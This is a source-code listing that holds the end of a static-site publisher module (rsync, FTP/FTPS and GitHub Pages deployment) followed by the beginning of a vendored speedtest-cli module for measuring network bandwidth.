kwargs['stderr'] = self.devnull
capture = False
if capture:
kwargs['stdout'] = subprocess.PIPE
kwargs['stderr'] = subprocess.PIPE
self.capture = capture
self._cmd = portable_popen(argline, **kwargs)
def wait(self):
returncode = self._cmd.wait()
if hasattr(self, "devnull"):
self.devnull.close()
return returncode
@property
def returncode(self):
return self._cmd.returncode
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self._cmd.wait()
def __iter__(self):
if not self.capture:
raise RuntimeError('Not capturing')
# Windows platforms do not have select() for files
if os.name == 'nt':
q = queue.Queue()
def reader(stream):
while 1:
line = stream.readline()
q.put(line)
if not line:
break
t1 = threading.Thread(target=reader, args=(self._cmd.stdout,))
t1.setDaemon(True)
t2 = threading.Thread(target=reader, args=(self._cmd.stderr,))
t2.setDaemon(True)
t1.start()
t2.start()
outstanding = 2
while outstanding:
item = q.get()
if not item:
outstanding -= 1
else:
yield item.rstrip().decode('utf-8', 'replace')
# Otherwise we can go with select()
else:
streams = [self._cmd.stdout, self._cmd.stderr]
while streams:
for l in select.select(streams, [], streams):
for stream in l:
line = stream.readline()
if not line:
if stream in streams:
streams.remove(stream)
break
yield line.rstrip().decode('utf-8', 'replace')
def safe_iter(self):
with self:
for line in self:
yield line
@property
def output(self):
return self.safe_iter()
class Publisher(object):
def __init__(self, env, output_path):
self.env = env
self.output_path = os.path.abspath(output_path)
def fail(self, message):
raise PublishError(message)
def publish(self, target_url, credentials=None, **extra):
raise NotImplementedError()
class RsyncPublisher(Publisher):
def get_command(self, target_url, tempdir, credentials):
credentials = credentials or {}
argline = ['rsync', '-rclzv', '--exclude=.lektor']
target = []
env = {}
keyfile = _write_ssh_key_file(os.path.join(
tempdir, 'ssh-auth-key'), credentials)
if target_url.port is not None or keyfile is not None:
argline.append('-e')
argline.append(_get_ssh_cmd(target_url.port, keyfile))
username = credentials.get('username') or target_url.username
if username:
target.append(username + '@')
target.append(target_url.ascii_host)
target.append(':' + target_url.path.rstrip('/') + '/')
argline.append(self.output_path.rstrip('/\\') + '/')
argline.append(''.join(target))
return Command(argline, env=env)
def publish(self, target_url, credentials=None, **extra):
with _temporary_folder(self.env) as tempdir:
client = self.get_command(target_url, tempdir, credentials)
with client:
for line in client:
yield line
class FtpConnection(object):
def __init__(self, url, credentials=None):
credentials = credentials or {}
self.con = self.make_connection()
self.url = url
self.username = credentials.get('username') or url.username
self.password = credentials.get('password') or url.password
self.log_buffer = []
self._known_folders = set()
def make_connection(self):
from ftplib import FTP
return FTP()
def drain_log(self):
log = self.log_buffer[:]
del self.log_buffer[:]
for chunk in log:
for line in chunk.splitlines():
if not isinstance(line, text_type):
line = line.decode('utf-8', 'replace')
yield line.rstrip()
def connect(self):
options = self.url.decode_query()
log = self.log_buffer
log.append('000 Connecting to server ...')
try:
log.append(self.con.connect(self.url.ascii_host,
self.url.port or 21))
except Exception as e:
log.append('000 Could not connect.')
log.append(str(e))
return False
try:
credentials = {}
if PY2:
if self.username:
credentials["user"] = self.username.encode('utf-8')
if self.password:
credentials["passwd"] = self.password.encode('utf-8')
else:
if self.username:
credentials["user"] = self.username
if self.password:
credentials["passwd"] = self.password
log.append(self.con.login(**credentials))
except Exception as e:
log.append('000 Could not authenticate.')
log.append(str(e))
return False
passive = options.get('passive') in ('on', 'yes', 'true', '1', None)
log.append('000 Using passive mode: %s' % (passive and 'yes' or 'no'))
self.con.set_pasv(passive)
try:
log.append(self.con.cwd(self.url.path))
except Exception as e:
log.append(str(e))
return False
log.append('000 Connected!')
return True
def mkdir(self, path, recursive=True):
if not isinstance(path, text_type):
path = path.decode('utf-8')
if path in self._known_folders:
return
dirname, basename = posixpath.split(path)
if dirname and recursive:
self.mkdir(dirname)
try:
self.con.mkd(path)
except FTPError as e:
msg = str(e)
if msg[:4] != '550 ':
self.log_buffer.append(str(e))
return
self._known_folders.add(path)
def append(self, filename, data):
if not isinstance(filename, text_type):
filename = filename.decode('utf-8')
if PY2:
input = StringIO(data)
else:
input = BytesIO(data.encode('utf-8'))
try:
self.con.storbinary('APPE ' + filename, input)
except FTPError as e:
self.log_buffer.append(str(e))
return False
return True
def get_file(self, filename, out=None):
if not isinstance(filename, text_type):
filename = filename.decode('utf-8')
getvalue = False
if out is None:
if PY2:
out = StringIO()
else:
out = BytesIO()
getvalue = True
try:
self.con.retrbinary('RETR ' + filename, out.write)
except FTPError as e:
msg = str(e)
if msg[:4] != '550 ':
self.log_buffer.append(str(e))
return None
if getvalue:
if PY2:
return out.getvalue()
return out.getvalue().decode('utf-8')
return out
def upload_file(self, filename, src, mkdir=False):
if isinstance(src, string_types):
if PY2:
src = StringIO(src)
else:
src = BytesIO(src.encode('utf-8'))
if mkdir:
directory = posixpath.dirname(filename)
if directory:
self.mkdir(directory, recursive=True)
if not isinstance(filename, text_type):
filename = filename.decode('utf-8')
try:
self.con.storbinary('STOR ' + filename, src,
blocksize=32768)
except FTPError as e:
self.log_buffer.append(str(e))
return False
return True
def rename_file(self, src, dst):
try:
self.con.rename(src, dst)
except FTPError as e:
self.log_buffer.append(str(e))
try:
self.con.delete(dst)
except Exception as e:
self.log_buffer.append(str(e))
try:
self.con.rename(src, dst)
except Exception as e:
self.log_buffer.append(str(e))
def delete_file(self, filename):
if isinstance(filename, text_type):
filename = filename.encode('utf-8')
try:
self.con.delete(filename)
except Exception as e:
self.log_buffer.append(str(e))
def delete_folder(self, filename):
if isinstance(filename, text_type):
filename = filename.encode('utf-8')
try:
self.con.rmd(filename)
except Exception as e:
self.log_buffer.append(str(e))
self._known_folders.discard(filename)
class FtpTlsConnection(FtpConnection):
def make_connection(self):
from ftplib import FTP_TLS
return FTP_TLS()
def connect(self):
connected = super(FtpTlsConnection, self).connect()
if connected:
# Upgrade data connection to TLS.
self.con.prot_p() # pylint: disable=no-member
return connected
class FtpPublisher(Publisher):
connection_class = FtpConnection
def read_existing_artifacts(self, con):
contents = con.get_file('.lektor/listing')
if not contents:
return {}, set()
duplicates = set()
rv = {}
# Later records override earlier ones. There can be duplicate
# entries if the file was not compressed.
for line in contents.splitlines():
items = line.split('|')
if len(items) == 2:
if not isinstance(items[0], text_type):
artifact_name = items[0].decode('utf-8')
else:
artifact_name = items[0]
if artifact_name in rv:
duplicates.add(artifact_name)
rv[artifact_name] = items[1]
return rv, duplicates
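# The '.lektor/listing' file consists of "artifact|checksum" lines; for
# illustration (hypothetical paths and SHA-1 values):
#   index.html|2aae6c35c94fcfb415dbe95f408b9ce91ee846ed
#   blog/index.html|7b502c3a1f48c8609ae212cdfb639dee39673f5e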
def iter_artifacts(self):
"""Iterates over all artifacts in the build folder and yields the
artifacts.
"""
for dirpath, dirnames, filenames in os.walk(self.output_path):
dirnames[:] = [x for x in dirnames
if not self.env.is_ignored_artifact(x)]
for filename in filenames:
if self.env.is_ignored_artifact(filename):
continue
full_path = os.path.join(self.output_path, dirpath, filename)
local_path = full_path[len(self.output_path):] \
.lstrip(os.path.sep)
if os.path.altsep:
local_path = local_path.lstrip(os.path.altsep)
h = hashlib.sha1()
try:
with open(full_path, 'rb') as f:
while 1:
item = f.read(4096)
if not item:
break
h.update(item)
except IOError as e:
if e.errno != errno.ENOENT:
raise
yield (
local_path.replace(os.path.sep, '/'),
full_path,
h.hexdigest(),
)
def get_temp_filename(self, filename):
dirname, basename = posixpath.split(filename)
return posixpath.join(dirname, '.' + basename + '.tmp')
def upload_artifact(self, con, artifact_name, source_file, checksum):
with open(source_file, 'rb') as source:
tmp_dst = self.get_temp_filename(artifact_name)
con.log_buffer.append('000 Updating %s' % artifact_name)
con.upload_file(tmp_dst, source, mkdir=True)
con.rename_file(tmp_dst, artifact_name)
con.append('.lektor/listing', '%s|%s\n' % (
artifact_name, checksum
))
def consolidate_listing(self, con, current_artifacts):
server_artifacts, duplicates = self.read_existing_artifacts(con)
known_folders = set()
for artifact_name in iterkeys(current_artifacts):
known_folders.add(posixpath.dirname(artifact_name))
for artifact_name, checksum in iteritems(server_artifacts):
if artifact_name not in current_artifacts:
con.log_buffer.append('000 Deleting %s' % artifact_name)
con.delete_file(artifact_name)
folder = posixpath.dirname(artifact_name)
if folder not in known_folders:
con.log_buffer.append('000 Deleting %s' % folder)
con.delete_folder(folder)
if duplicates or server_artifacts != current_artifacts:
listing = []
for artifact_name, checksum in iteritems(current_artifacts):
listing.append('%s|%s\n' % (artifact_name, checksum))
listing.sort()
con.upload_file('.lektor/.listing.tmp', ''.join(listing))
con.rename_file('.lektor/.listing.tmp', '.lektor/listing')
def publish(self, target_url, credentials=None, **extra):
con = self.connection_class(target_url, credentials)
connected = con.connect()
for event in con.drain_log():
yield event
if not connected:
return
yield '000 Reading server state ...'
con.mkdir('.lektor')
committed_artifacts, _ = self.read_existing_artifacts(con)
for event in con.drain_log():
yield event
yield '000 Begin sync ...'
current_artifacts = {}
for artifact_name, filename, checksum in self.iter_artifacts():
current_artifacts[artifact_name] = checksum
if checksum != committed_artifacts.get(artifact_name):
self.upload_artifact(con, artifact_name, filename, checksum)
for event in con.drain_log():
yield event
yield '000 Sync done!'
yield '000 Consolidating server state ...'
self.consolidate_listing(con, current_artifacts)
for event in con.drain_log():
yield event
yield '000 All done!'
class FtpTlsPublisher(FtpPublisher):
connection_class = FtpTlsConnection
class GithubPagesPublisher(Publisher):
def get_credentials(self, url, credentials=None):
credentials = credentials or {}
username = credentials.get('username') or url.username
password = credentials.get('password') or url.password
rv = username
if username and password:
rv += ':' + password
return rv if rv else None
def update_git_config(self, repo, url, branch, credentials=None):
ssh_command = None
path = url.host + u'/' + url.path.strip(u'/')
cred = None
if url.scheme in ('ghpages', 'ghpages+ssh'):
push_url = 'git@github.com:%s.git' % path
keyfile = _write_ssh_key_file(os.path.join(
repo, '.git', 'ssh-auth-key'), credentials)
if keyfile or url.port:
ssh_command = _get_ssh_cmd(url.port, keyfile)
else:
push_url = 'https://github.com/%s.git' % path
cred = self.get_credentials(url, credentials)
with open(os.path.join(repo, '.git', 'config'), 'a') as f:
f.write('[remote "origin"]\nurl = %s\n'
'fetch = +refs/heads/%s:refs/remotes/origin/%s\n' %
(push_url, branch, branch))
if cred:
cred_path = os.path.join(repo, '.git', 'credentials')
f.write('[credential]\nhelper = store --file "%s"\n' %
cred_path)
with open(cred_path, 'w') as cf:
cf.write('https://%s@github.com\n' % cred)
return ssh_command
def link_artifacts(self, path):
try:
link = os.link
except AttributeError:
link = shutil.copy
# Clean old
for filename in os.listdir(path):
if filename == '.git':
continue
filename = os.path.join(path, filename)
try:
os.remove(filename)
except OSError:
shutil.rmtree(filename)
# Add new
for dirpath, dirnames, filenames in os.walk(self.output_path):
dirnames[:] = [x for x in dirnames if x != '.lektor']
for filename in filenames:
full_path = os.path.join(self.output_path, dirpath, filename)
dst = os.path.join(path, full_path[len(self.output_path):]
.lstrip(os.path.sep)
.lstrip(os.path.altsep or ''))
try:
os.makedirs(os.path.dirname(dst))
except (OSError, IOError):
pass
try:
link(full_path, dst)
except OSError: # Different Filesystems
shutil.copy(full_path, dst)
def write_cname(self, path, target_url):
params = target_url.decode_query()
cname = params.get('cname')
if cname is not None:
with open(os.path.join(path, 'CNAME'), 'w') as f:
f.write('%s\n' % cname)
def detect_target_branch(self, target_url):
# When pushing to the username.github.io repo we need to push to
# master, otherwise to gh-pages
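# For illustration (hypothetical target URLs): ghpages://alice/alice.github.io
# resolves to 'master', while ghpages://alice/some-project resolves to 'gh-pages'.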
if (target_url.host.lower() + '.github.io' ==
target_url.path.strip('/').lower()):
branch = 'master'
else:
branch = 'gh-pages'
return branch
def publish(self, target_url, credentials=None, **extra):
if not locate_executable('git'):
self.fail('git executable not found; cannot deploy.')
branch = self.detect_target_branch(target_url)
with _temporary_folder(self.env) as path:
ssh_command = None
def git(args, **kwargs):
kwargs['env'] = _patch_git_env(kwargs.pop('env', None),
ssh_command)
return Command(['git'] + args, cwd=path, **kwargs)
for line in git(['init']).output:
yield line
ssh_command = self.update_git_config(path, target_url, branch,
credentials)
for line in git(['remote', 'update']).output:
yield line
if git(['checkout', '-q', branch], silent=True).wait() != 0:
git(['checkout', '-qb', branch], silent=True).wait()
self.link_artifacts(path)
self.write_cname(path, target_url)
for line in git(['add', '-f', '--all', '.']).output:
yield line
for line in git(['commit', '-qm', 'Synchronized build']).output:
yield line
for line in git(['push', 'origin', branch]).output:
yield line
builtin_publishers = {
'rsync': RsyncPublisher,
'ftp': FtpPublisher,
'ftps': FtpTlsPublisher,
'ghpages': GithubPagesPublisher,
'ghpages+https': GithubPagesPublisher,
'ghpages+ssh': GithubPagesPublisher,
}
def publish(env, target, output_path, credentials=None, **extra):
url = urls.url_parse(text_type(target))
publisher = env.publishers.get(url.scheme)
if publisher is None:
raise PublishError('"%s" is an unknown scheme.' % url.scheme)
return publisher(env, output_path).publish(url, credentials, **extra)
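# Usage sketch (hypothetical target URL and output path; assumes `env` exposes
# `publishers` and `temp_path` as used above):
#     for line in publish(env, 'rsync://deploy@example.com/srv/www/site', './_build'):
#         print(line)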
|
speedtest.py
|
# Taken from https://github.com/sivel/speedtest-cli
import csv
import datetime
import errno
import math
import os
import platform
import re
import signal
import socket
import sys
import threading
import timeit
import xml.parsers.expat
from insomniac import utils
try:
import gzip
GZIP_BASE = gzip.GzipFile
except ImportError:
gzip = None
GZIP_BASE = object
__version__ = "2.1.2"
class FakeShutdownEvent(object):
"""Class to fake a threading.Event.isSet so that users of this module
are not required to register their own threading.Event()
"""
@staticmethod
def isSet():
"Dummy method to always return false" ""
return False
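# Instances of FakeShutdownEvent can be passed wherever a threading.Event is
# expected by this module when no external shutdown signalling is needed.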
# Some global variables we use
DEBUG = False
_GLOBAL_DEFAULT_TIMEOUT = object()
PY25PLUS = sys.version_info[:2] >= (2, 5)
PY26PLUS = sys.version_info[:2] >= (2, 6)
PY32PLUS = sys.version_info[:2] >= (3, 2)
# Begin import game to handle Python 2 and Python 3
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
json = None
try:
import xml.etree.ElementTree as ET
try:
from xml.etree.ElementTree import _Element as ET_Element
except ImportError:
pass
except ImportError:
from xml.dom import minidom as DOM
from xml.parsers.expat import ExpatError
ET = None
try:
from urllib2 import (
urlopen,
Request,
HTTPError,
URLError,
AbstractHTTPHandler,
ProxyHandler,
HTTPDefaultErrorHandler,
HTTPRedirectHandler,
HTTPErrorProcessor,
OpenerDirector,
)
except ImportError:
from urllib.request import (
urlopen,
Request,
HTTPError,
URLError,
AbstractHTTPHandler,
ProxyHandler,
HTTPDefaultErrorHandler,
HTTPRedirectHandler,
HTTPErrorProcessor,
OpenerDirector,
)
try:
from httplib import HTTPConnection, BadStatusLine
except ImportError:
from http.client import HTTPConnection, BadStatusLine
try:
from httplib import HTTPSConnection
except ImportError:
try:
from http.client import HTTPSConnection
except ImportError:
HTTPSConnection = None
try:
from httplib import FakeSocket
except ImportError:
FakeSocket = None
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
from argparse import SUPPRESS as ARG_SUPPRESS
PARSER_TYPE_INT = int
PARSER_TYPE_STR = str
PARSER_TYPE_FLOAT = float
except ImportError:
from optparse import OptionParser as ArgParser
from optparse import SUPPRESS_HELP as ARG_SUPPRESS
PARSER_TYPE_INT = "int"
PARSER_TYPE_STR = "string"
PARSER_TYPE_FLOAT = "float"
try:
from cStringIO import StringIO
BytesIO = None
except ImportError:
try:
from StringIO import StringIO
BytesIO = None
except ImportError:
from io import StringIO, BytesIO
if PY32PLUS:
etree_iter = ET.Element.iter
elif PY25PLUS:
etree_iter = ET_Element.getiterator
if PY26PLUS:
thread_is_alive = threading.Thread.is_alive
else:
thread_is_alive = threading.Thread.isAlive
# Exception "constants" to support Python 2 through Python 3
try:
import ssl
try:
CERT_ERROR = (ssl.CertificateError,)
except AttributeError:
CERT_ERROR = tuple()
HTTP_ERRORS = (
HTTPError,
URLError,
socket.error,
ssl.SSLError,
BadStatusLine,
) + CERT_ERROR
except ImportError:
ssl = None
HTTP_ERRORS = (HTTPError, URLError, socket.error, BadStatusLine)
class SpeedtestException(Exception):
"""Base exception for this module"""
class SpeedtestCLIError(SpeedtestException):
"""Generic exception for raising errors during CLI operation"""
class SpeedtestHTTPError(SpeedtestException):
"""Base HTTP exception for this module"""
class SpeedtestConfigError(SpeedtestException):
"""Configuration XML is invalid"""
class SpeedtestServersError(SpeedtestException):
"""Servers XML is invalid"""
class ConfigRetrievalError(SpeedtestHTTPError):
"""Could not retrieve config.php"""
class ServersRetrievalError(SpeedtestHTTPError):
"""Could not retrieve speedtest-servers.php"""
class InvalidServerIDType(SpeedtestException):
"""Server ID used for filtering was not an integer"""
class NoMatchedServers(SpeedtestException):
"""No servers matched when filtering"""
class SpeedtestMiniConnectFailure(SpeedtestException):
"""Could not connect to the provided speedtest mini server"""
class InvalidSpeedtestMiniServer(SpeedtestException):
"""Server provided as a speedtest mini server does not actually appear
to be a speedtest mini server
"""
class ShareResultsConnectFailure(SpeedtestException):
"""Could not connect to speedtest.net API to POST results"""
class ShareResultsSubmitFailure(SpeedtestException):
"""Unable to successfully POST results to speedtest.net API after
connection
"""
class SpeedtestUploadTimeout(SpeedtestException):
"""testlength configuration reached during upload
Used to ensure the upload halts when no additional data should be sent
"""
class SpeedtestBestServerFailure(SpeedtestException):
"""Unable to determine best server"""
class SpeedtestMissingBestServer(SpeedtestException):
"""get_best_server not called or not able to determine best server"""
def create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT, source_address=None):
"""Connect to *address* and return the socket object.
Convenience function. Connect to *address* (a 2-tuple ``(host,
port)``) and return the socket object. Passing the optional
*timeout* parameter will set the timeout on the socket instance
before attempting to connect. If no *timeout* is supplied, the
global default timeout setting returned by :func:`getdefaulttimeout`
is used. If *source_address* is set it must be a tuple of (host, port)
for the socket to bind as a source address before making the connection.
A host of '' or port 0 tells the OS to use the default.
Largely vendored from Python 2.7, modified to work with Python 2.4
"""
host, port = address
err = None
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(float(timeout))
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except socket.error:
err = get_exception()
if sock is not None:
sock.close()
if err is not None:
raise err
else:
raise socket.error("getaddrinfo returns an empty list")
class SpeedtestHTTPConnection(HTTPConnection):
"""Custom HTTPConnection to support source_address across
Python 2.4 - Python 3
"""
def __init__(self, *args, **kwargs):
source_address = kwargs.pop("source_address", None)
timeout = kwargs.pop("timeout", 10)
self._tunnel_host = None
HTTPConnection.__init__(self, *args, **kwargs)
self.source_address = source_address
self.timeout = timeout
def connect(self):
"""Connect to the host and port specified in __init__."""
try:
self.sock = socket.create_connection(
(self.host, self.port), self.timeout, self.source_address
)
except (AttributeError, TypeError):
self.sock = create_connection(
(self.host, self.port), self.timeout, self.source_address
)
if self._tunnel_host:
self._tunnel()
if HTTPSConnection:
class SpeedtestHTTPSConnection(HTTPSConnection):
"""Custom HTTPSConnection to support source_address across
Python 2.4 - Python 3
"""
default_port = 443
def __init__(self, *args, **kwargs):
source_address = kwargs.pop("source_address", None)
timeout = kwargs.pop("timeout", 10)
self._tunnel_host = None
HTTPSConnection.__init__(self, *args, **kwargs)
self.timeout = timeout
self.source_address = source_address
def connect(self):
"Connect to a host on a given (SSL) port."
try:
self.sock = socket.create_connection(
(self.host, self.port), self.timeout, self.source_address
)
except (AttributeError, TypeError):
self.sock = create_connection(
(self.host, self.port), self.timeout, self.source_address
)
if self._tunnel_host:
self._tunnel()
if ssl:
try:
kwargs = {}
if hasattr(ssl, "SSLContext"):
if self._tunnel_host:
kwargs["server_hostname"] = self._tunnel_host
else:
kwargs["server_hostname"] = self.host
self.sock = self._context.wrap_socket(self.sock, **kwargs)
except AttributeError:
self.sock = ssl.wrap_socket(self.sock)
try:
self.sock.server_hostname = self.host
except AttributeError:
pass
elif FakeSocket:
# Python 2.4/2.5 support
try:
self.sock = FakeSocket(self.sock, socket.ssl(self.sock))
except AttributeError:
raise SpeedtestException(
"This version of Python does not support HTTPS/SSL "
"functionality"
)
else:
raise SpeedtestException(
"This version of Python does not support HTTPS/SSL " "functionality"
)
def _build_connection(connection, source_address, timeout, context=None):
"""Cross Python 2.4 - Python 3 callable to build an ``HTTPConnection`` or
``HTTPSConnection`` with the args we need
Called from ``http(s)_open`` methods of ``SpeedtestHTTPHandler`` or
``SpeedtestHTTPSHandler``
"""
def inner(host, **kwargs):
kwargs.update({"source_address": source_address, "timeout": timeout})
if context:
kwargs["context"] = context
return connection(host, **kwargs)
return inner
class SpeedtestHTTPHandler(AbstractHTTPHandler):
"""Custom ``HTTPHandler`` that can build a ``HTTPConnection`` with the
args we need for ``source_address`` and ``timeout``
"""
def __init__(self, debuglevel=0, source_address=None, timeout=10):
AbstractHTTPHandler.__init__(self, debuglevel)
self.source_address = source_address
self.timeout = timeout
def http_open(self, req):
return self.do_open(
_build_connection(
SpeedtestHTTPConnection, self.source_address, self.timeout
),
req,
)
http_request = AbstractHTTPHandler.do_request_
class SpeedtestHTTPSHandler(AbstractHTTPHandler):
"""Custom ``HTTPSHandler`` that can build a ``HTTPSConnection`` with the
args we need for ``source_address`` and ``timeout``
"""
def __init__(self, debuglevel=0, context=None, source_address=None, timeout=10):
AbstractHTTPHandler.__init__(self, debuglevel)
self._context = context
self.source_address = source_address
self.timeout = timeout
def https_open(self, req):
return self.do_open(
_build_connection(
SpeedtestHTTPSConnection,
self.source_address,
self.timeout,
context=self._context,
),
req,
)
https_request = AbstractHTTPHandler.do_request_
def build_opener(source_address=None, timeout=10):
"""Function similar to ``urllib2.build_opener`` that will build
an ``OpenerDirector`` with the explicit handlers we want,
``source_address`` for binding, ``timeout`` and our custom
`User-Agent`
"""
printer("Timeout set to %d" % timeout, debug=True)
if source_address:
source_address_tuple = (source_address, 0)
printer("Binding to source address: %r" % (source_address_tuple,), debug=True)
else:
source_address_tuple = None
handlers = [
ProxyHandler(),
SpeedtestHTTPHandler(source_address=source_address_tuple, timeout=timeout),
SpeedtestHTTPSHandler(source_address=source_address_tuple, timeout=timeout),
HTTPDefaultErrorHandler(),
HTTPRedirectHandler(),
HTTPErrorProcessor(),
]
opener = OpenerDirector()
opener.addheaders = [("User-agent", build_user_agent())]
for handler in handlers:
opener.add_handler(handler)
return opener
class GzipDecodedResponse(GZIP_BASE):
"""A file-like object to decode a response encoded with the gzip
method, as described in RFC 1952.
Largely copied from ``xmlrpclib``/``xmlrpc.client`` and modified
to work for py2.4-py3
"""
def __init__(self, response):
# response doesn't support tell() and read(), required by
# GzipFile
if not gzip:
raise SpeedtestHTTPError(
"HTTP response body is gzip encoded, "
"but gzip support is not available"
)
IO = BytesIO or StringIO
self.io = IO()
while 1:
chunk = response.read(1024)
if len(chunk) == 0:
break
self.io.write(chunk)
self.io.seek(0)
gzip.GzipFile.__init__(self, mode="rb", fileobj=self.io)
def close(self):
try:
gzip.GzipFile.close(self)
finally:
self.io.close()
def get_exception():
"""Helper function to work with py2.4-py3 for getting the current
exception in a try/except block
"""
return sys.exc_info()[1]
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(
math.radians(lat1)
) * math.cos(math.radians(lat2)) * math.sin(dlon / 2) * math.sin(dlon / 2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
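# Quick sanity check (illustrative, not part of the original file): with the
# 6371 km Earth radius used above, one degree of longitude along the equator
# works out to roughly 111.19 km.
#
#     >>> round(distance((0.0, 0.0), (0.0, 1.0)), 2)
#     111.19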
def build_user_agent():
"""Build a Mozilla/5.0 compatible User-Agent string"""
ua_tuple = (
"Mozilla/5.0",
"(%s; U; %s; en-us)" % (platform.platform(), platform.architecture()[0]),
"Python/%s" % platform.python_version(),
"(KHTML, like Gecko)",
"speedtest-cli/%s" % __version__,
)
user_agent = " ".join(ua_tuple)
printer("User-Agent: %s" % user_agent, debug=True)
return user_agent
def build_request(url, data=None, headers=None, bump="0", secure=False):
"""Build a urllib2 request object
This function automatically adds a User-Agent header to all requests
"""
if not headers:
headers = {}
if url[0] == ":":
scheme = ("http", "https")[bool(secure)]
schemed_url = "%s%s" % (scheme, url)
else:
schemed_url = url
if "?" in url:
delim = "&"
else:
delim = "?"
# WHO YOU GONNA CALL? CACHE BUSTERS!
final_url = "%s%sx=%s.%s" % (
schemed_url,
delim,
int(timeit.time.time() * 1000),
bump,
)
headers.update(
{
"Cache-Control": "no-cache",
}
)
printer("%s %s" % (("GET", "POST")[bool(data)], final_url), debug=True)
return Request(final_url, data=data, headers=headers)
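# Illustrative example (not part of the original file): with ``secure=True``
# the scheme-relative URLs used throughout this module expand to HTTPS and a
# cache-busting query string is appended, yielding a request roughly like
# https://www.speedtest.net/speedtest-config.php?x=<ms-timestamp>.0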
def catch_request(request, opener=None):
"""Helper function to catch common exceptions encountered when
establishing a connection with an HTTP/HTTPS request
"""
if opener:
_open = opener.open
else:
_open = urlopen
try:
uh = _open(request)
if request.get_full_url() != uh.geturl():
printer("Redirected to %s" % uh.geturl(), debug=True)
return uh, False
except HTTP_ERRORS:
e = get_exception()
return None, e
def get_response_stream(response):
"""Helper function to return either a Gzip reader if
``Content-Encoding`` is ``gzip`` otherwise the response itself
"""
try:
getheader = response.headers.getheader
except AttributeError:
getheader = response.getheader
if getheader("content-encoding") == "gzip":
return GzipDecodedResponse(response)
return response
def get_attributes_by_tag_name(dom, tag_name):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tag_name)[0]
return dict(list(elem.attributes.items()))
def print_dots(shutdown_event):
"""Built in callback function used by Thread classes for printing
status
"""
def inner(current, total, start=False, end=False):
if shutdown_event.isSet():
return
sys.stdout.write(".")
if current + 1 == total and end is True:
sys.stdout.write("\n")
sys.stdout.flush()
return inner
def do_nothing(*args, **kwargs):
pass
class HTTPDownloader(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, i, request, start, timeout, opener=None, shutdown_event=None):
threading.Thread.__init__(self)
self.request = request
self.result = [0]
self.starttime = start
self.timeout = timeout
self.i = i
if opener:
self._opener = opener.open
else:
self._opener = urlopen
if shutdown_event:
self._shutdown_event = shutdown_event
else:
self._shutdown_event = FakeShutdownEvent()
def run(self):
try:
if (timeit.default_timer() - self.starttime) <= self.timeout:
f = self._opener(self.request)
while (
not self._shutdown_event.isSet()
and (timeit.default_timer() - self.starttime) <= self.timeout
):
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
class HTTPUploaderData(object):
"""File like object to improve cutting off the upload once the timeout
has been reached
"""
def __init__(self, length, start, timeout, shutdown_event=None):
self.length = length
self.start = start
self.timeout = timeout
if shutdown_event:
self._shutdown_event = shutdown_event
else:
self._shutdown_event = FakeShutdownEvent()
self._data = None
self.total = [0]
def pre_allocate(self):
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
multiplier = int(round(int(self.length) / 36.0))
IO = BytesIO or StringIO
try:
self._data = IO(
(
"content1=%s" % (chars * multiplier)[0 : int(self.length) - 9]
).encode()
)
except MemoryError:
raise SpeedtestCLIError(
"Insufficient memory to pre-allocate upload data. Please "
"use --no-pre-allocate"
)
@property
def data(self):
if not self._data:
self.pre_allocate()
return self._data
def read(self, n=10240):
if (
timeit.default_timer() - self.start
) <= self.timeout and not self._shutdown_event.isSet():
chunk = self.data.read(n)
self.total.append(len(chunk))
return chunk
else:
raise SpeedtestUploadTimeout()
def __len__(self):
return self.length
class HTTPUploader(threading.Thread):
"""Thread class for putting a URL"""
def __init__(
self, i, request, start, size, timeout, opener=None, shutdown_event=None
):
threading.Thread.__init__(self)
self.request = request
self.request.data.start = self.starttime = start
self.size = size
self.result = None
self.timeout = timeout
self.i = i
if opener:
self._opener = opener.open
else:
self._opener = urlopen
if shutdown_event:
self._shutdown_event = shutdown_event
else:
self._shutdown_event = FakeShutdownEvent()
def run(self):
request = self.request
try:
if (
timeit.default_timer() - self.starttime
) <= self.timeout and not self._shutdown_event.isSet():
try:
f = self._opener(request)
except TypeError:
# PY24 expects a string or buffer
# This also causes issues with Ctrl-C, but we will concede
# for the moment that Ctrl-C on PY24 isn't immediate
request = build_request(
self.request.get_full_url(), data=request.data.read(self.size)
)
f = self._opener(request)
f.read(11)
f.close()
self.result = sum(self.request.data.total)
else:
self.result = 0
except (IOError, SpeedtestUploadTimeout):
self.result = sum(self.request.data.total)
class SpeedtestResults(object):
"""Class for holding the results of a speedtest, including:
Download speed
Upload speed
Ping/Latency to test server
Data about server that the test was run against
Additionally this class can return the result data as a dictionary, CSV,
or JSON, as well as submit a POST of the result data to the speedtest.net
API to get a share results image link.
"""
def __init__(
self,
download=0,
upload=0,
ping=0,
server=None,
client=None,
opener=None,
secure=False,
):
self.download = download
self.upload = upload
self.ping = ping
if server is None:
self.server = {}
else:
self.server = server
self.client = client or {}
self._share = None
self.timestamp = "%sZ" % datetime.datetime.utcnow().isoformat()
self.bytes_received = 0
self.bytes_sent = 0
if opener:
self._opener = opener
else:
self._opener = build_opener()
self._secure = secure
def __repr__(self):
return repr(self.dict())
def share(self):
"""POST data to the speedtest.net API to obtain a share results
link
"""
